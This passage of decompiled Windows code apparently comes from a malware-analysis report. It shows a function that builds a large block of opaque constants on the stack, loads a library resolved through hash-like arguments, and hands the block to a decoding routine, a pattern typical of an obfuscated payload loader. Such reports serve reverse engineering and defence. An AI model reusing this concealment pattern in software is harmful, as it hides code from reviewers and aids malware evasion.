				intOrPtr _v484;
				intOrPtr _v488;
				intOrPtr _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				intOrPtr _v512;
				intOrPtr _v516;
				intOrPtr _v520;
				intOrPtr _v524;
				intOrPtr _v528;
				intOrPtr _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				intOrPtr _v676;
				intOrPtr _v680;
				intOrPtr _v684;
				intOrPtr _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				intOrPtr _v708;
				intOrPtr _v712;
				intOrPtr _v716;
				intOrPtr _v720;
				intOrPtr _v724;
				intOrPtr _v728;
				intOrPtr _v732;
				intOrPtr _v736;
				intOrPtr _v740;
				intOrPtr _v744;
				intOrPtr _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				intOrPtr _v760;
				intOrPtr _v764;
				intOrPtr _v768;
				intOrPtr _v772;
				intOrPtr _v776;
				intOrPtr _v780;
				intOrPtr _v784;
				intOrPtr _v788;
				intOrPtr _v792;
				intOrPtr _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _v816;
				intOrPtr _v820;
				intOrPtr _v824;
				intOrPtr _v828;
				intOrPtr _v832;
				intOrPtr _v836;
				intOrPtr _v840;
				intOrPtr _v844;
				intOrPtr _v848;
				intOrPtr _v852;
				intOrPtr _v856;
				intOrPtr _v860;
				intOrPtr _v864;
				intOrPtr _v868;
				intOrPtr _v872;
				intOrPtr _v876;
				intOrPtr _v880;
				intOrPtr _v884;
				intOrPtr _v888;
				intOrPtr _v892;
				intOrPtr _v896;
				intOrPtr _v900;
				intOrPtr _v904;
				intOrPtr _v908;
				intOrPtr _v912;
				intOrPtr _v916;
				intOrPtr _v920;
				intOrPtr _v924;
				intOrPtr _v928;
				intOrPtr _v932;
				intOrPtr _v936;
				intOrPtr _v940;
				intOrPtr _v944;
				intOrPtr _v948;
				intOrPtr _v952;
				intOrPtr _v956;
				intOrPtr _v960;
				intOrPtr _v964;
				intOrPtr _v968;
				intOrPtr _v972;
				intOrPtr _v976;
				intOrPtr _v980;
				intOrPtr _v984;
				intOrPtr _v988;
				intOrPtr _v992;
				intOrPtr _v996;
				intOrPtr _v1000;
				intOrPtr _v1004;
				intOrPtr _v1008;
				intOrPtr _v1012;
				intOrPtr _v1016;
				intOrPtr _v1020;
				intOrPtr _v1024;
				intOrPtr _v1028;
				intOrPtr _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				intOrPtr _v1060;
				intOrPtr _v1064;
				intOrPtr _v1068;
				intOrPtr _v1072;
				intOrPtr _v1076;
				intOrPtr _v1080;
				intOrPtr _v1084;
				intOrPtr _v1088;
				intOrPtr _v1092;
				intOrPtr _v1096;
				intOrPtr _v1100;
				intOrPtr _v1104;
				intOrPtr _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				intOrPtr _v1120;
				intOrPtr _v1124;
				intOrPtr _v1128;
				intOrPtr _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				intOrPtr _v1144;
				intOrPtr _v1148;
				intOrPtr _v1152;
				intOrPtr _v1156;
				intOrPtr _v1160;
				intOrPtr _v1164;
				intOrPtr _v1168;
				intOrPtr _v1172;
				intOrPtr _v1176;
				intOrPtr _v1180;
				intOrPtr _v1184;
				intOrPtr _v1188;
				intOrPtr _v1192;
				intOrPtr _v1196;
				intOrPtr _v1200;
				intOrPtr _v1204;
				intOrPtr _v1208;
				intOrPtr _v1212;
				intOrPtr _v1216;
				intOrPtr _v1220;
				intOrPtr _v1224;
				intOrPtr _v1228;
				intOrPtr _v1232;
				intOrPtr _v1236;
				intOrPtr _v1240;
				intOrPtr _v1244;
				intOrPtr _v1248;
				intOrPtr _v1252;
				intOrPtr _v1256;
				intOrPtr _v1260;
				intOrPtr _v1264;
				intOrPtr _v1268;
				intOrPtr _v1272;
				intOrPtr _v1276;
				intOrPtr _v1280;
				intOrPtr _v1284;
				intOrPtr _v1288;
				intOrPtr _v1292;
				intOrPtr _v1296;
				intOrPtr _v1300;
				intOrPtr _v1304;
				intOrPtr _v1308;
				intOrPtr _v1312;
				intOrPtr _v1316;
				intOrPtr _v1320;
				intOrPtr _v1324;
				intOrPtr _v1328;
				intOrPtr _v1332;
				intOrPtr _v1336;
				intOrPtr _v1340;
				intOrPtr _v1344;
				intOrPtr _v1348;
				intOrPtr _v1352;
				intOrPtr _v1356;
				intOrPtr _v1360;
				intOrPtr _v1364;
				intOrPtr _v1368;
				intOrPtr _v1372;
				intOrPtr _v1376;
				intOrPtr _v1380;
				intOrPtr _v1384;
				intOrPtr _v1388;
				intOrPtr _v1392;
				intOrPtr _v1396;
				intOrPtr _v1400;
				intOrPtr _v1404;
				intOrPtr _v1408;
				intOrPtr _v1412;
				intOrPtr _v1416;
				intOrPtr _v1420;
				intOrPtr _v1424;
				intOrPtr _v1428;
				intOrPtr _v1432;
				intOrPtr _v1436;
				intOrPtr _v1440;
				intOrPtr _v1444;
				intOrPtr _v1448;
				intOrPtr _v1452;
				intOrPtr _v1456;
				intOrPtr _v1460;
				intOrPtr _v1464;
				intOrPtr _v1468;
				intOrPtr _v1472;
				intOrPtr _v1476;
				intOrPtr _v1480;
				intOrPtr _v1484;
				intOrPtr _v1488;
				intOrPtr _v1492;
				intOrPtr _v1496;
				intOrPtr _v1500;
				intOrPtr _v1504;
				intOrPtr _v1508;
				intOrPtr _v1512;
				intOrPtr _v1516;
				intOrPtr _v1520;
				intOrPtr _v1524;
				intOrPtr _v1528;
				intOrPtr _v1532;
				intOrPtr _v1536;
				intOrPtr _v1540;
				intOrPtr _v1544;
				intOrPtr _v1548;
				intOrPtr _v1552;
				intOrPtr _v1556;
				intOrPtr _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				intOrPtr _v1576;
				intOrPtr _v1580;
				intOrPtr _v1584;
				intOrPtr _v1588;
				intOrPtr _v1592;
				intOrPtr _v1596;
				intOrPtr _v1600;
				intOrPtr _v1604;
				intOrPtr _v1608;
				intOrPtr _v1612;
				intOrPtr _v1616;
				intOrPtr _v1620;
				intOrPtr _v1624;
				intOrPtr _v1628;
				intOrPtr _v1632;
				intOrPtr _v1636;
				intOrPtr _v1640;
				intOrPtr _v1644;
				intOrPtr _v1648;
				intOrPtr _v1652;
				intOrPtr _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				intOrPtr _v1676;
				intOrPtr _v1680;
				intOrPtr _v1684;
				intOrPtr _v1688;
				intOrPtr _v1692;
				intOrPtr _v1696;
				intOrPtr _v1700;
				intOrPtr _v1704;
				intOrPtr _v1708;
				intOrPtr _v1712;
				intOrPtr _v1716;
				intOrPtr _v1720;
				intOrPtr _v1724;
				intOrPtr _v1728;
				intOrPtr _v1732;
				intOrPtr _v1736;
				intOrPtr _v1740;
				intOrPtr _v1744;
				intOrPtr _v1748;
				intOrPtr _v1752;
				intOrPtr _v1756;
				intOrPtr _v1760;
				intOrPtr _v1764;
				intOrPtr _v1768;
				intOrPtr _v1772;
				intOrPtr _v1776;
				intOrPtr _v1780;
				intOrPtr _v1784;
				intOrPtr _v1788;
				intOrPtr _v1792;
				intOrPtr _v1796;
				intOrPtr _v1800;
				intOrPtr _v1804;
				intOrPtr _v1808;
				intOrPtr _v1812;
				intOrPtr _v1816;
				intOrPtr _v1820;
				intOrPtr _v1824;
				intOrPtr _v1828;
				intOrPtr _v1832;
				intOrPtr _v1836;
				intOrPtr _v1840;
				intOrPtr _v1844;
				intOrPtr _v1848;
				intOrPtr _v1852;
				intOrPtr _v1856;
				intOrPtr _v1860;
				intOrPtr _v1864;
				intOrPtr _v1868;
				intOrPtr _v1872;
				intOrPtr _v1876;
				intOrPtr _v1880;
				intOrPtr _v1884;
				char _v1888;
				struct HINSTANCE__* _t474;

				_v1888 = 0xa41c4ed0;
				_v1884 = 0x1a33c848;
				_v1880 = 0xf78674dd;
				_v1876 = 0x4d35aed;
				_v1872 = 0x5597c7b0;
				_v1868 = 0xb0ef52b0;
				_v1864 = 0x9b5bf2a7;
				_v1860 = 0xbf81a217;
				_v1856 = 0x3adcb09b;
				_v1852 = 0xe8ac849c;
				_v1848 = 0x57b96c20;
				_v1844 = 0xcd9f7235;
				_v1840 = 0xf420170d;
				_v1836 = 0x14cdf27a;
				_v1832 = 0xfd5eb0fb;
				_v1828 = 0x39318b65;
				_v1824 = 0x65d03115;
				_v1820 = 0x95260aff;
				_v1816 = 0x2e67c28e;
				_v1812 = 0xa1f4a8f4;
				_v1808 = 0xc812f1ab;
				_v1804 = 0xd934dc9c;
				_v1800 = 0xa4e6685;
				_v1796 = 0xfe213c23;
				_v1792 = 0x43c6d29;
				_v1788 = 0xcf12bcb8;
				_v1784 = 0x9f98cc3;
				_v1780 = 0xa1b2d167;
				_v1776 = 0x7fad3c40;
				_v1772 = 0xa80d3c34;
				_v1768 = 0xc8f714d7;
				_v1764 = 0x671d7785;
				_v1760 = 0x4a0ac7c8;
				_v1756 = 0x21c03928;
				_v1752 = 0x4555c0d0;
				_v1748 = 0x9834af68;
				_v1744 = 0xc6d9895d;
				_v1740 = 0xda921464;
				_v1736 = 0x6b089d64;
				_v1732 = 0xfec570b;
				_v1728 = 0xc3626a82;
				_v1724 = 0xd34a14be;
				_v1720 = 0xb7eabcaf;
				_v1716 = 0x281b3387;
				_v1712 = 0xcabf350d;
				_v1708 = 0x207d4223;
				_v1704 = 0xbc0cb804;
				_v1700 = 0xdefac10b;
				_v1696 = 0x679df176;
				_v1692 = 0x6390c0b9;
				_v1688 = 0x817bdef2;
				_v1684 = 0xcb119739;
				_v1680 = 0xd62a3fcf;
				_v1676 = 0x5b6539ee;
				_v1672 = 0x2ebc383e;
				_v1668 = 0xf6595eaa;
				_v1664 = 0xe1fa3158;
				_v1660 = 0xd81c642d;
				_v1656 = 0x5b3ff5b2;
				_v1652 = 0x25dcb5f4;
				_v1648 = 0xb74a4541;
				_v1644 = 0x65280c6a;
				_v1640 = 0x507410e2;
				_v1636 = 0x162eb7ae;
				_v1632 = 0x983fe17e;
				_v1628 = 0x1dce09e5;
				_v1624 = 0x20a01932;
				_v1620 = 0xf8c2ec13;
				_v1616 = 0xd03324ad;
				_v1612 = 0xdda4a81a;
				_v1608 = 0xefe7666e;
				_v1604 = 0x3499fe41;
				_v1600 = 0xfef05481;
				_v1596 = 0x4379be19;
				_v1592 = 0xac2a8a8c;
				_v1588 = 0xaa65ea73;
				_v1584 = 0x780f71c2;
				_v1580 = 0xbc7e1592;
				_v1576 = 0xb46dbbf2;
				_v1572 = 0x7f4481aa;
				_v1568 = 0x4c400fc5;
				_v1564 = 0xd0e27c84;
				_v1560 = 0xa0e4f48d;
				_v1556 = 0x608f4f65;
				_v1552 = 0x81e08196;
				_v1548 = 0x12e25f1;
				_v1544 = 0x108b753a;
				_v1540 = 0x734d6144;
				_v1536 = 0x2099d367;
				_v1532 = 0x4af859b5;
				_v1528 = 0x64274aa4;
				_v1524 = 0xd77c3180;
				_v1520 = 0xd07c56cd;
				_v1516 = 0x63b940a8;
				_v1512 = 0xdefbc07f;
				_v1508 = 0x1ed0b183;
				_v1504 = 0x946279a2;
				_v1500 = 0x1b4e182;
				_v1496 = 0xbd9e9d5e;
				_v1492 = 0xf895b090;
				_v1488 = 0x83ef7189;
				_v1484 = 0xdb6fdda0;
				_v1480 = 0xc43f2288;
				_v1476 = 0xfa2ee974;
				_v1472 = 0xad630715;
				_v1468 = 0x6e3f94ea;
				_v1464 = 0xc210224a;
				_v1460 = 0x5e42620a;
				_v1456 = 0xbdc03864;
				_v1452 = 0xfa898059;
				_v1448 = 0x5b223206;
				_v1444 = 0xe6ee380f;
				_v1440 = 0xe9c024a5;
				_v1436 = 0x795a214e;
				_v1432 = 0xf661e49b;
				_v1428 = 0x5d53c5b6;
				_v1424 = 0xe92e65b3;
				_v1420 = 0xe7f485b4;
				_v1416 = 0xe34b82e0;
				_v1412 = 0xaac6e570;
				_v1408 = 0xd3519085;
				_v1404 = 0x9d031edf;
				_v1400 = 0x16517768;
				_v1396 = 0x6b60337c;
				_v1392 = 0x87f162f5;
				_v1388 = 0x30b72081;
				_v1384 = 0xaf9664d7;
				_v1380 = 0xd1c1388f;
				_v1376 = 0xbaeca29b;
				_v1372 = 0x2614ddd9;
				_v1368 = 0xfd4ce0b1;
				_v1364 = 0x5c9c68b7;
				_v1360 = 0x2676eff1;
				_v1356 = 0x3d50e3a3;
				_v1352 = 0x53c809b1;
				_v1348 = 0x2d212e3b;
				_v1344 = 0x84a1010a;
				_v1340 = 0xafe995ff;
				_v1336 = 0x624ecd4e;
				_v1332 = 0xa0b9de9d;
				_v1328 = 0xf70d11ba;
				_v1324 = 0xe13ac65e;
				_v1320 = 0x94330fb1;
				_v1316 = 0x4ba9883c;
				_v1312 = 0xf9b4aa94;
				_v1308 = 0x1528153;
				_v1304 = 0xab11f915;
				_v1300 = 0xf65a3f7d;
				_v1296 = 0xf416523f;
				_v1292 = 0x622e2452;
				_v1288 = 0xe7dd6fea;
				_v1284 = 0xc53292c3;
				_v1280 = 0x341cfd;
				_v1276 = 0x1bf5cfa4;
				_v1272 = 0x3d6d8fc5;
				_v1268 = 0x882e2a5d;
				_v1264 = 0xf4dab66;
				_v1260 = 0x879777e1;
				_v1256 = 0x4235fa33;
				_v1252 = 0xf7412f63;
				_v1248 = 0x744366b8;
				_v1244 = 0x5d79780f;
				_v1240 = 0x33df1776;
				_v1236 = 0xa6b205d3;
				_v1232 = 0x7f6a7839;
				_v1228 = 0x671dbdce;
				_v1224 = 0xedb53a4e;
				_v1220 = 0x7885bf0f;
				_v1216 = 0x5d5e08dc;
				_v1212 = 0xe0da0cb9;
				_v1208 = 0x72626c3b;
				_v1204 = 0xf7523beb;
				_v1200 = 0xd3cbf7c0;
				_v1196 = 0xf397c375;
				_v1192 = 0xe8e0e8b8;
				_v1188 = 0xda2713ea;
				_v1184 = 0x61e812b;
				_v1180 = 0x1f5e76ae;
				_v1176 = 0xfcc0fd26;
				_v1172 = 0xa4f96784;
				_v1168 = 0xdfc74366;
				_v1164 = 0x4770325;
				_v1160 = 0xfcfb039;
				_v1156 = 0xbb5cd5be;
				_v1152 = 0x835bb17f;
				_v1148 = 0x45f03008;
				_v1144 = 0x8157471b;
				_v1140 = 0x92daa034;
				_v1136 = 0xc4415ba2;
				_v1132 = 0x1b6c5a77;
				_v1128 = 0x7e366518;
				_v1124 = 0x83ab0c1d;
				_v1120 = 0x397b67c4;
				_v1116 = 0xbf8a7d;
				_v1112 = 0x2e52b5be;
				_v1108 = 0x4c915e05;
				_v1104 = 0x3753c1d6;
				_v1100 = 0x95d39f06;
				_v1096 = 0x3d258823;
				_v1092 = 0x3608b8f8;
				_v1088 = 0xb4fbe8a7;
				_v1084 = 0x4c3e8f06;
				_v1080 = 0xe8794991;
				_v1076 = 0xdccaeb41;
				_v1072 = 0x9e236e45;
				_v1068 = 0xc17af71c;
				_v1064 = 0x4e7519a6;
				_v1060 = 0xc27014cc;
				_v1056 = 0x4d83d065;
				_v1052 = 0x6af34f37;
				_v1048 = 0xcd08d804;
				_v1044 = 0x3d730bc7;
				_v1040 = 0x21e8c57d;
				_v1036 = 0x317420d4;
				_v1032 = 0x6ebcf6dd;
				_v1028 = 0x7247c452;
				_v1024 = 0x690e32a5;
				_v1020 = 0x265b9d09;
				_v1016 = 0xef460e82;
				_v1012 = 0xbd38bc0;
				_v1008 = 0xce8b0c3b;
				_v1004 = 0x87b18560;
				_v1000 = 0x923ada08;
				_v996 = 0x7954f0df;
				_v992 = 0x59d4296d;
				_v988 = 0x598866b0;
				_v984 = 0x5ebed584;
				_v980 = 0x75f303ed;
				_v976 = 0x4bd185df;
				_v972 = 0x90668e75;
				_v968 = 0xef0ec6ee;
				_v964 = 0xfb160c3c;
				_v960 = 0xdddf860c;
				_v956 = 0xe3ec7c97;
				_v952 = 0xd84fe87a;
				_v948 = 0x4eebf6de;
				_v944 = 0x6598361e;
				_v940 = 0x2d4f37a9;
				_v936 = 0x20c189e8;
				_v932 = 0x1da649ac;
				_v928 = 0xbb2d17b0;
				_v924 = 0x7365b2a6;
				_v920 = 0x748039dd;
				_v916 = 0x40abf8ad;
				_v912 = 0xc2230aa3;
				_v908 = 0xddc9542f;
				_v904 = 0xd5cbbac;
				_v900 = 0x44de193b;
				_v896 = 0xe51fd5ad;
				_v892 = 0xf9739bdf;
				_v888 = 0xf511941f;
				_v884 = 0xbb4c8f97;
				_v880 = 0x71f29f4a;
				_v876 = 0xf93e7335;
				_v872 = 0xb3d5a235;
				_v868 = 0x8bf5639b;
				_v864 = 0xb678715c;
				_v860 = 0x1681d985;
				_v856 = 0xce6e3dde;
				_v852 = 0x5962f64c;
				_v848 = 0x1b0fea51;
				_v844 = 0xf304da7f;
				_v840 = 0x60dd60fc;
				_v836 = 0x4894e820;
				_v832 = 0xd4c5e951;
				_v828 = 0xbc0c6801;
				_v824 = 0x1b410e8d;
				_v820 = 0x9d4beae1;
				_v816 = 0xb4470101;
				_v812 = 0xefc6595c;
				_v808 = 0x1942297a;
				_v804 = 0x452f53c1;
				_v800 = 0x60736a8a;
				_v796 = 0x1cb5c8c2;
				_v792 = 0xa3b92496;
				_v788 = 0x3604e2c0;
				_v784 = 0x7d04dd0b;
				_v780 = 0xf93943b2;
				_v776 = 0xa34c9da0;
				_v772 = 0x16093c22;
				_v768 = 0x6230157f;
				_v764 = 0xf80a9182;
				_v760 = 0x9d202d62;
				_v756 = 0x58881b4d;
				_v752 = 0x7261191d;
				_v748 = 0xee6a2a6f;
				_v744 = 0x8b6ed692;
				_v740 = 0xf4ad89c5;
				_v736 = 0x902f328c;
				_v732 = 0xdae187c2;
				_v728 = 0x84c69aaf;
				_v724 = 0x8b583ddc;
				_v720 = 0x3154736a;
				_v716 = 0xf0ba94f8;
				_v712 = 0x371d3c0;
				_v708 = 0x9490ef0f;
				_v704 = 0x2d449fdf;
				_v700 = 0xb6d886dd;
				_v696 = 0x34ac4b5b;
				_v692 = 0x4add82f5;
				_v688 = 0x5643055a;
				_v684 = 0xedb6a896;
				_v680 = 0xf3b73e97;
				_v676 = 0xcd8bf45d;
				_v672 = 0x93a0ea35;
				_v668 = 0xf51d7bfd;
				_v664 = 0xd083f728;
				_v660 = 0x5978c810;
				_v656 = 0xacfb548d;
				_v652 = 0x681791b;
				_v648 = 0xab7f89b7;
				_v644 = 0x4f840277;
				_v640 = 0x45cf5527;
				_v636 = 0xafbc6fa5;
				_v632 = 0x7709f48f;
				_v628 = 0x8685cbd3;
				_v624 = 0x39eebbf5;
				_v620 = 0x5d1c8064;
				_v616 = 0x20fe1dce;
				_v612 = 0x69db75cc;
				_v608 = 0x9b65dc5a;
				_v604 = 0x27934866;
				_v600 = 0xf19b8bb6;
				_v596 = 0x887f0721;
				_v592 = 0x679fda8;
				_v588 = 0x78284a0;
				_v584 = 0x265fdb89;
				_v580 = 0x73ed0821;
				_v576 = 0x7d12f58b;
				_v572 = 0xc29cc904;
				_v568 = 0xf8cd14ad;
				_v564 = 0x5a59d9e2;
				_v560 = 0xa4ddcf31;
				_v556 = 0x91ce662e;
				_v552 = 0xc476dab;
				_v548 = 0xe8647b34;
				_v544 = 0x7a59bdcd;
				_v540 = 0xff29671e;
				_v536 = 0x37ab0d4d;
				_v532 = 0x3b7b2c58;
				_v528 = 0xdaca9837;
				_v524 = 0x5d95c73f;
				_v520 = 0x8d2d8ef2;
				_v516 = 0xe3a7eb3d;
				_v512 = 0x93410f8b;
				_v508 = 0x40690df9;
				_v504 = 0x56050e5c;
				_v500 = 0xdf7e7ef6;
				_v496 = 0xe57bff2d;
				_v492 = 0x8053dea3;
				_v488 = 0xca387b31;
				_v484 = 0x32eccb66;
				_v480 = 0xafb3b6b8;
				_v476 = 0x8f23f2d6;
				_v472 = 0x5fd00aa;
				_v468 = 0x7ba3d053;
				_v464 = 0xbed15460;
				_v460 = 0x91a7f84b;
				_v456 = 0x509deafe;
				_v452 = 0x8be07147;
				_v448 = 0x2a1903f7;
				_v444 = 0x74e13ee;
				_v440 = 0x46703439;
				_v436 = 0xf34281b8;
				_v432 = 0x88689edc;
				_v428 = 0xae06c319;
				_v424 = 0x809e0f7;
				_v420 = 0x32e2a63c;
				_v416 = 0x351aba4e;
				_v412 = 0x6bda9779;
				_v408 = 0xff25d6b;
				_v404 = 0xf19e2b12;
				_v400 = 0xe09ee902;
				_v396 = 0x30162918;
				_v392 = 0xf554291d;
				_v388 = 0xd293bf0c;
				_v384 = 0xa5aaa34d;
				_v380 = 0x18af0b32;
				_v376 = 0x45d3b443;
				_v372 = 0x8a8542bb;
				_v368 = 0xb2938f72;
				_v364 = 0x375b0514;
				_v360 = 0xa0175b99;
				_v356 = 0xab05d150;
				_v352 = 0xb2ab1a30;
				_v348 = 0xe6d1d6f1;
				_v344 = 0x5bc1d28d;
				_v340 = 0x31ab7862;
				_v336 = 0xb32f6993;
				_v332 = 0x3bff57b5;
				_v328 = 0xf4362081;
				_v324 = 0xa41ea41;
				_v320 = 0xf5554d12;
				_v316 = 0xe74be567;
				_v312 = 0xdda94f36;
				_v308 = 0x9942b8d7;
				_v304 = 0xa73018e6;
				_v300 = 0x65aa1921;
				_v296 = 0xa0ad1bda;
				_v292 = 0xfa54f506;
				_v288 = 0x36d533d2;
				_v284 = 0x2a17a738;
				_v280 = 0x24a73c55;
				_v276 = 0x25c6e7c;
				_v272 = 0x792542e6;
				_v268 = 0x60fe3e84;
				_v264 = 0xe894fa28;
				_v260 = 0xa8c3bd02;
				_v256 = 0xdec79a5c;
				_v252 = 0xaeea5367;
				_v248 = 0x9618cdf9;
				_v244 = 0x4d53bb98;
				_v240 = 0xc82415fb;
				_v236 = 0x311045a0;
				_v232 = 0x435d92ea;
				_v228 = 0x64d81a20;
				_v224 = 0x1a745c98;
				_v220 = 0xbb1cacab;
				_v216 = 0xb68b62f7;
				_v212 = 0x2262a170;
				_v208 = 0x244f7cd;
				_v204 = 0x634247e8;
				_v200 = 0x8e6f29ce;
				_v196 = 0xc125d02b;
				_v192 = 0xe1fb1246;
				_v188 = 0x90ff749d;
				_v184 = 0x9d49b7a9;
				_v180 = 0x8ae4cd18;
				_v176 = 0xdc3b0e33;
				_v172 = 0x5357343f;
				_v168 = 0x9078d775;
				_v164 = 0x7cd42af4;
				_v160 = 0x85875278;
				_v156 = 0xe098b691;
				_v152 = 0xdd539cbf;
				_v148 = 0x7b6915e6;
				_v144 = 0xdfa72c20;
				_v140 = 0x15af0b24;
				_v136 = 0x1e90183d;
				_v132 = 0xae2521d9;
				_v128 = 0x132fe8d2;
				_v124 = 0x7628aa01;
				_v120 = 0xf98981af;
				_v116 = 0xdeee782f;
				_v112 = 0x7ff5b8f;
				_v108 = 0x3a7c246a;
				_v104 = 0x8c6af67;
				_v100 = 0x27178fff;
				_v96 = 0x40ce6aac;
				_v92 = 0xe05cdea;
				_v88 = 0x1a09cd63;
				_v84 = 0x4ab557a2;
				_v80 = 0x578e6083;
				_v76 = 0x73ab4d0a;
				_v72 = 0x4577df03;
				_v68 = 0x388ee30c;
				_v64 = 0xa6a001f8;
				_v60 = 0xa362abb;
				_v56 = 0x4c361001;
				_v52 = 0x52b9ecf;
				_v48 = 0xf779ca4b;
				_v44 = 0xf0d67399;
				_v40 = 0x26e6d555;
				_v36 = 0xda742f2c;
				_v32 = 0x945c9d84;
				_v28 = 0x85b2d426;
				_v24 = 0x3e9987ee;
				_v20 = 0x9c588149;
				_v16 = 0x5b70fee9;
				_v12 = 0x724f6ac9;
				_v8 = 0x3e06e993;
				_t482 = E00401A52(0x412320, 0x72fc3a35);
				_t474 = LoadLibraryW(_t473); // executed
				 *0x4164ec = _t474;
				L00401B09(_t482);
				_push(0x414710);
				_push(0x81c5b25);
				return E004012FF( *0x4164ec,  &_v1888, 0x1d7);
			}



























































































































































































































































































































































































































































































                  0x004076d0
                  0x004076da
                  0x004076e4
                  0x004076ee
                  0x004076f8
                  0x00407702
                  0x0040770c
                  0x00407716
                  0x00407720
                  0x0040772a
                  0x00407734
                  0x0040773e
                  0x00407748
                  0x00407752
                  0x0040775c
                  0x00407766
                  0x00407770
                  0x0040777a
                  0x00407784
                  0x0040778e
                  0x00407798
                  0x004077a2
                  0x004077ac
                  0x004077b6
                  0x004077c0
                  0x004077ca
                  0x004077d4
                  0x004077de
                  0x004077e8
                  0x004077f2
                  0x004077fc
                  0x00407806
                  0x00407810
                  0x0040781a
                  0x00407824
                  0x0040782e
                  0x00407838
                  0x00407842
                  0x0040784c
                  0x00407856
                  0x00407860
                  0x0040786a
                  0x00407874
                  0x0040787e
                  0x00407888
                  0x00407892
                  0x0040789c
                  0x004078a6
                  0x004078b0
                  0x004078ba
                  0x004078c4
                  0x004078ce
                  0x004078d8
                  0x004078e2
                  0x004078ec
                  0x004078f6
                  0x00407900
                  0x0040790a
                  0x00407914
                  0x0040791e
                  0x00407928
                  0x00407932
                  0x0040793c
                  0x00407946
                  0x00407950
                  0x0040795a
                  0x00407964
                  0x0040796e
                  0x00407978
                  0x00407982
                  0x0040798c
                  0x00407996
                  0x004079a0
                  0x004079aa
                  0x004079b4
                  0x004079be
                  0x004079c8
                  0x004079d2
                  0x004079dc
                  0x004079e6
                  0x004079f0
                  0x004079fa
                  0x00407a04
                  0x00407a0e
                  0x00407a18
                  0x00407a22
                  0x00407a2c
                  0x00407a36
                  0x00407a40
                  0x00407a4a
                  0x00407a54
                  0x00407a5e
                  0x00407a68
                  0x00407a72
                  0x00407a7c
                  0x00407a86
                  0x00407a90
                  0x00407a9a
                  0x00407aa4
                  0x00407aae
                  0x00407ab8
                  0x00407ac2
                  0x00407acc
                  0x00407ad6
                  0x00407ae0
                  0x00407aea
                  0x00407af4
                  0x00407afe
                  0x00407b08
                  0x00407b12
                  0x00407b1c
                  0x00407b26
                  0x00407b30
                  0x00407b3a
                  0x00407b44
                  0x00407b4e
                  0x00407b58
                  0x00407b62
                  0x00407b6c
                  0x00407b76
                  0x00407b80
                  0x00407b8a
                  0x00407b94
                  0x00407b9e
                  0x00407ba8
                  0x00407bb2
                  0x00407bbc
                  0x00407bc6
                  0x00407bd0
                  0x00407bda
                  0x00407be4
                  0x00407bee
                  0x00407bf8
                  0x00407c02
                  0x00407c0c
                  0x00407c16
                  0x00407c20
                  0x00407c2a
                  0x00407c34
                  0x00407c3e
                  0x00407c48
                  0x00407c52
                  0x00407c5c
                  0x00407c66
                  0x00407c70
                  0x00407c7a
                  0x00407c84
                  0x00407c8e
                  0x00407c98
                  0x00407ca2
                  0x00407cac
                  0x00407cb6
                  0x00407cc0
                  0x00407cca
                  0x00407cd4
                  0x00407cde
                  0x00407ce8
                  0x00407cf2
                  0x00407cfc
                  0x00407d06
                  0x00407d10
                  0x00407d1a
                  0x00407d24
                  0x00407d2e
                  0x00407d38
                  0x00407d42
                  0x00407d4c
                  0x00407d56
                  0x00407d60
                  0x00407d6a
                  0x00407d74
                  0x00407d7e
                  0x00407d88
                  0x00407d92
                  0x00407d9c
                  0x00407da6
                  0x00407db0
                  0x00407dba
                  0x00407dc4
                  0x00407dce
                  0x00407dd8
                  0x00407de2
                  0x00407dec
                  0x00407df6
                  0x00407e00
                  0x00407e0a
                  0x00407e14
                  0x00407e1e
                  0x00407e28
                  0x00407e32
                  0x00407e3c
                  0x00407e46
                  0x00407e50
                  0x00407e5a
                  0x00407e64
                  0x00407e6e
                  0x00407e78
                  0x00407e82
                  0x00407e8c
                  0x00407e96
                  0x00407ea0
                  0x00407eaa
                  0x00407eb4
                  0x00407ebe
                  0x00407ec8
                  0x00407ed2
                  0x00407edc
                  0x00407ee6
                  0x00407ef0
                  0x00407efa
                  0x00407f04
                  0x00407f0e
                  0x00407f18
                  0x00407f22
                  0x00407f2c
                  0x00407f36
                  0x00407f40
                  0x00407f4a
                  0x00407f54
                  0x00407f5e
                  0x00407f68
                  0x00407f72
                  0x00407f7c
                  0x00407f86
                  0x00407f90
                  0x00407f9a
                  0x00407fa4
                  0x00407fae
                  0x00407fb8
                  0x00407fc2
                  0x00407fcc
                  0x00407fd6
                  0x00407fe0
                  0x00407fea
                  0x00407ff4
                  0x00407ffe
                  0x00408008
                  0x00408012
                  0x0040801c
                  0x00408026
                  0x00408030
                  0x0040803a
                  0x00408044
                  0x0040804e
                  0x00408058
                  0x00408062
                  0x0040806c
                  0x00408076
                  0x00408080
                  0x0040808a
                  0x00408094
                  0x0040809e
                  0x004080a8
                  0x004080b2
                  0x004080bc
                  0x004080c6
                  0x004080d0
                  0x004080da
                  0x004080e4
                  0x004080ee
                  0x004080f8
                  0x00408102
                  0x0040810c
                  0x00408116
                  0x00408120
                  0x0040812a
                  0x00408134
                  0x0040813e
